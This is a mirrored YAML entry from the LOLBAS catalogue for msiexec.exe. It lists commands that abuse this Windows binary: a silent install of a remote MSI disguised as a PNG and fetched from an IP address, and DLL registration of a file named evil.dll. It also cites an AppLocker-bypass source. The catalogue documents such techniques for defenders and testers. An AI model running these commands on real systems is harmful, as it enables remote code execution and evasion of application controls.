mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 06:49:09 +01:00
26 lines
885 B
YAML
26 lines
885 B
YAML
---
|
|
Name: Msiexec.exe
|
|
Description: Execute
|
|
Author: ''
|
|
Created: '2018-05-25'
|
|
Categories: []
|
|
Commands:
|
|
- Command: msiexec /quiet /i cmd.msi
|
|
Description: Installs the target .MSI file silently.
|
|
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
|
|
Description: Installs the target remote & renamed .MSI file silently.
|
|
- Command: msiexec /y "C:\folder\evil.dll"
|
|
Description: Calls DLLRegisterServer to register the target DLL.
|
|
- Command: msiexec /z "C:\folder\evil.dll"
|
|
Description: Calls DLLRegisterServer to un-register the target DLL.
|
|
Full Path:
|
|
- c:\windows\system32\msiexec.exe
|
|
- c:\windows\sysWOW64\msiexec.exe
|
|
Code Sample: []
|
|
Detection: []
|
|
Resources:
|
|
- https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
|
- https://twitter.com/PhilipTsukerman/status/992021361106268161
|
|
Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman
|
|
|